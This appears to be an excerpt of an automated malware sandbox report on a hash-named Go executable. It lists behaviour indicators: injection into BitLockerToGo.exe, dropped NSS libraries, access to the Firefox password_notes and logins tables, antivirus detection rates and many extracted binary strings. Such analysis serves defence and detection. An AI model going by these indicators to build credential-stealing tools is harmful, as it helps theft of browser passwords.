                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02763720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_02763720
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9GM2419D.htmJump to behavior
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                      Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: BitLockerToGo.exe, 00000001.00000003.1916221843.0000000022B59000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1916221437.0000000002A70000.00000004.00000020.00020000.00000000.sdmp, IDAAKEHJDHJKEBFHJEGD.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                      Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeReversingLabs: Detection: 52%
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeVirustotal: Detection: 54%
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: $github.com/mmcloughlin/addchain/meta
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: $*set.Iterator[go.shape.interface {}]$*func(map[string]interface {}) error$github.com/vmihailenco/msgpack/codes$*map[reflect.Type]chan reflect.Value$*map.bucket[string]function.Function$*func(cty.unknownValRefinement) bool$*func(string) *cty.RefinementBuilder$*func() protoreflect.EnumDescriptors$*func(protoreflect.MethodDescriptor)$appendDescriptorProto_ExtensionRange$*func() protoreflect.SourceLocations$*func(int) protoreflect.ProtoMessage$*func() protoreflect.OneofDescriptor$*func() protoreflect.FieldDescriptor$*struct { pragma.NoUnkeyedLiterals }$*map[int32]protoreflect.ProtoMessage$*func(protoreflect.ProtoMessage) int$*map.bucket[chan struct {}]struct {}$*func([]cty.Value) (cty.Type, error)$*func() (cty.Value, hcl.Diagnostics)$*func(impl.pointer) protowire.Number$*func(protoreflect.MessageType) bool$*[8]protoregistry.extensionsByNumber$*func(config.Element) config.Element$github.com/mmcloughlin/addchain/meta
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: &github.com/mmcloughlin/addchain/acc/ir
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: 'github.com/mmcloughlin/addchain/acc/ast
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: '*atomic.Pointer[encoding/gob.encEngine]'*struct { F uintptr; X0 *gob.typeInfo }'*map.bucket[string]metrics.SampledValue'*func(context.Context, metrics.Encoder)'*func(int) protoreflect.FieldDescriptor'appendExtensionRangeOptions_Declaration'*func() protoreflect.MessageDescriptors'*func() protoreflect.ServiceDescriptors'*func(protoreflect.EnumValueDescriptor)'*func(int) protoreflect.OneofDescriptor'github.com/hashicorp/go-immutable-radix'*map[protoreflect.Name]*filedesc.Method'*func(protoreflect.ExtensionType) error'*func(impl.pointer, protoreflect.Value)'*func(protoreflect.Value) reflect.Value'*func(reflect.Value) protoreflect.Value'*interface { XXX_MessageName() string }'*func(protoreflect.FileDescriptor) bool'*map[protoreflect.FullName]interface {}'*func(func(protoreflect.EnumType) bool)'google.golang.org/grpc/internal/grpclog'github.com/mmcloughlin/addchain/acc/ast(*func(*bisect.dedup, *bisect.dedup) bool
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: (github.com/mmcloughlin/addchain/acc/pass
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: asn1:"optional,explicit,tag:1"(*func(logrus.Level, *logrus.Entry) error(*func(hclog.Level, []uint8) (int, error)(*func() credentials.TransportCredentials(*func(time.Duration, time.Duration) bool(*map.bucket[reflect.Type]*msgpack.fields(*func(int) protoreflect.MethodDescriptor(*func() protoreflect.EnumValueDescriptor(*func(protoreflect.FieldDescriptor) bool(*map[string]protoreflect.FieldDescriptor(*map[protoreflect.Name]*filedesc.Message(*func(protoreflect.FileDescriptor) error(*map[protoreflect.Name]*filedesc.Service(google.golang.org/protobuf/internal/impl(*func(interface {}) protoreflect.Message(*struct { F uintptr; X0 impl.Converter }(google.golang.org/protobuf/internal/strs(github.com/mmcloughlin/addchain/acc/pass(*struct { F uintptr; X0 int; X1 string }
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: .github.com/mmcloughlin/addchain/internal/print
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: Cgithub.com/consensys/gnark-crypto/field/generator/internal/addchain
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: Code>protobuf:"varint,1,opt,name=code,proto3" json:"code,omitempty"C*struct { F uintptr; X0 convert.Conversion; X1 convert.Conversion }C*func(protoreflect.FullName, func(protoreflect.ExtensionType) bool)Cgithub.com/consensys/gnark-crypto/field/generator/internal/addchain
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: invalid empty Content-Lengthnet/http: invalid trailer %shttp: no Host in request URLjson: Unmarshal(non-pointer !#$%&()*+-./:;<=>?@[]^_{|}~ unexpected end of JSON input after object key:value pair18189894035458564758300781259094947017729282379150390625reflect.MakeSlice: len > capzero precision finite numberbig: misuse of expNNWindowednegative n for ProbablyPrimehex string without 0x prefixunexpected type %T for Bytes0x64616f2d686172642d666f726bX-Consul-Translate-Addresses/v1/connect/ca/configuration/v1/connect/intentions/exact/v1/connect/intentions/match/v1/connect/intentions/checkfailed to create session: %v/v1/operator/autopilot/statepeering name cannot be emptyUnexpected response code: %dcannot unmarshal DNS messageerror encoding cty.Value: %serror decoding cty.Value: %sunsupported type in set hash%s required, but received %scannot parse '%s' as int: %sfailed to serialize type: %svalue must be a whole numberexpected string but found %Tfailed to read set value: %sfailed to read map value: %sGetSecurityDescriptorControlInitializeSecurityDescriptorSetSecurityDescriptorControlFindFirstChangeNotificationWGetProcessShutdownParametersSetProcessShutdownParametersWTSGetActiveConsoleSessionIdSetupDiClassGuidsFromNameExWSetupDiDestroyDeviceInfoListSetupDiDestroyDriverInfoListabi.NewName: name too long: x509: invalid RSA public keyx509: invalid DSA public keyx509: invalid DSA parametersx509: negative serial numberx509: unknown elliptic curvecurrent time %s is before %sasn1: string not valid UTF-8reflect: In of non-func typereflect: Key of non-map typetls: malformed ECHConfigListEd25519 verification failuremultipart: message too largemultipart: boundary is emptymalformed MIME header line: invalid byte in chunk lengthinvalid proxy address %q: %vpending ASN.1 child too longFailed to obtain reader, %v
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: failed to construct HKDF label: %sGODEBUG sys/cpu: can not disable "invalid nested repetition operatorinvalid or unsupported Perl syntaxError loading file from CAPath: %sname too long (%d bytes): %.20q...msgpack: Decode(nonaddressable %T)crypto/rsa: missing public moduluscrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapchacha20: wrong HChaCha20 key sizecustomdecode.ExpressionClosureTypeMultiplies the given number by -1.the size argument must be positiveunsupported value for %q at %d: %sbad tag in lazy extension decodingmismatching field: got %v, want %vonly degrees 1 and 2 are supported2006-01-02T15:04:05.999999999Z07:00non-positive interval for NewTickerrlp: non-canonical size informationrlp: cannot encode negative big.Intcould not find the kernel32 DLL: %vcrypto/md5: invalid hash state sizeencoding/hex: odd length hex stringnetwork dropped connection on resettransport endpoint is not connectedstrings.Reader.Seek: invalid whenceoptional header checksum is invalidCOFF symbols count is absurdly highnot a PE file, smaller than tiny PEEnglish Trinidad And Tobago (en-TT)Kanuri (Latin) Nigeria (kr-Latn-NG)Serbian (Latin) Serbia (sr-Latn-RS)` SizeOfRawData is larger than filepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=http: server closed idle connectionCONTINUATION frame with stream ID 01776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9isReflexive called on non-key type " is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %q'_' must separate successive digitshex number with leading zero digitsbigmod: modulus is smaller than natMust specify an ID in Policy Updateset value for either %q or %q in %qthe value %q cannot parsed as floatTupleElementTypes on non-tuple Typevalue does not have given index keymust not call MapVal with empty mapvalue has no attribute of that nameelement key for list must be number%s: unsupported type for squash: %sweird number of bits in target uintnot enough tuple elements (need %d)SubscribeServiceChangeNotificationsfile type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativeunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeP224 poi
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: failed to construct HKDF label: %sGODEBUG sys/cpu: can not disable "invalid nested repetition operatorinvalid or unsupported Perl syntaxError loading file from CAPath: %sname too long (%d bytes): %.20q...msgpack: Decode(nonaddressable %T)crypto/rsa: missing public moduluscrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapchacha20: wrong HChaCha20 key sizecustomdecode.ExpressionClosureTypeMultiplies the given number by -1.the size argument must be positiveunsupported value for %q at %d: %sbad tag in lazy extension decodingmismatching field: got %v, want %vonly degrees 1 and 2 are supported2006-01-02T15:04:05.999999999Z07:00non-positive interval for NewTickerrlp: non-canonical size informationrlp: cannot encode negative big.Intcould not find the kernel32 DLL: %vcrypto/md5: invalid hash state sizeencoding/hex: odd length hex stringnetwork dropped connection on resettransport endpoint is not connectedstrings.Reader.Seek: invalid whenceoptional header checksum is invalidCOFF symbols count is absurdly highnot a PE file, smaller than tiny PEEnglish Trinidad And Tobago (en-TT)Kanuri (Latin) Nigeria (kr-Latn-NG)Serbian (Latin) Serbia (sr-Latn-RS)` SizeOfRawData is larger than filepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=http: server closed idle connectionCONTINUATION frame with stream ID 01776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9isReflexive called on non-key type " is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %q'_' must separate successive digitshex number with leading zero digitsbigmod: modulus is smaller than natMust specify an ID in Policy Updateset value for either %q or %q in %qthe value %q cannot parsed as floatTupleElementTypes on non-tuple Typevalue does not have given index keymust not call MapVal with empty mapvalue has no attribute of that nameelement key for list must be number%s: unsupported type for squash: %sweird number of bits in target uintnot enough tuple elements (need %d)SubscribeServiceChangeNotificationsfile type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativeunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeP224 poi
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: failed to construct HKDF label: %sGODEBUG sys/cpu: can not disable "invalid nested repetition operatorinvalid or unsupported Perl syntaxError loading file from CAPath: %sname too long (%d bytes): %.20q...msgpack: Decode(nonaddressable %T)crypto/rsa: missing public moduluscrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapchacha20: wrong HChaCha20 key sizecustomdecode.ExpressionClosureTypeMultiplies the given number by -1.the size argument must be positiveunsupported value for %q at %d: %sbad tag in lazy extension decodingmismatching field: got %v, want %vonly degrees 1 and 2 are supported2006-01-02T15:04:05.999999999Z07:00non-positive interval for NewTickerrlp: non-canonical size informationrlp: cannot encode negative big.Intcould not find the kernel32 DLL: %vcrypto/md5: invalid hash state sizeencoding/hex: odd length hex stringnetwork dropped connection on resettransport endpoint is not connectedstrings.Reader.Seek: invalid whenceoptional header checksum is invalidCOFF symbols count is absurdly highnot a PE file, smaller than tiny PEEnglish Trinidad And Tobago (en-TT)Kanuri (Latin) Nigeria (kr-Latn-NG)Serbian (Latin) Serbia (sr-Latn-RS)` SizeOfRawData is larger than filepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=http: server closed idle connectionCONTINUATION frame with stream ID 01776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9isReflexive called on non-key type " is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %q'_' must separate successive digitshex number with leading zero digitsbigmod: modulus is smaller than natMust specify an ID in Policy Updateset value for either %q or %q in %qthe value %q cannot parsed as floatTupleElementTypes on non-tuple Typevalue does not have given index keymust not call MapVal with empty mapvalue has no attribute of that nameelement key for list must be number%s: unsupported type for squash: %sweird number of bits in target uintnot enough tuple elements (need %d)SubscribeServiceChangeNotificationsfile type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativeunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeP224 poi
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: depgithub.com/mmcloughlin/addchainv0.4.0h1:SobOdjm2xLj1KkXN5/n0xTIWyZA2+s99UCY1iPfkHRY=
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Equal
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.EqualInt64
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Pow2
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.One
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Mask
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Ones
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigints.Contains
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigints.Index
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Chain.Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigints.Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).AppendClone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Chain.End
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Chain.Ops
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Chain.Op
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Chain.Program
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Zero
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Chain.Validate
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Chain.Produces
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Chain.Superset
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Chain.IsAscending
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Op.IsDouble
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Op.Operands
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Op.Uses
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Shift
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Double
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Add
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Program.boundscheck
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Program.Doubles
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Program.Count
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Program.Adds
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Program.Evaluate
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.New
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Program.ReadCounts
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.Program.Dependencies
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).End
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).IsAscending
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Op
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Ops
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Produces
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Program
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Superset
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Validate
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Op).IsDouble
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Op).Operands
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Op).Uses
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Adds
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Count
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Dependencies
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Doubles
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Evaluate
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain.(*Program).ReadCounts
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).AddInstruction
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Program.Output
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Program.Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Instruction.Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Operand.Clone
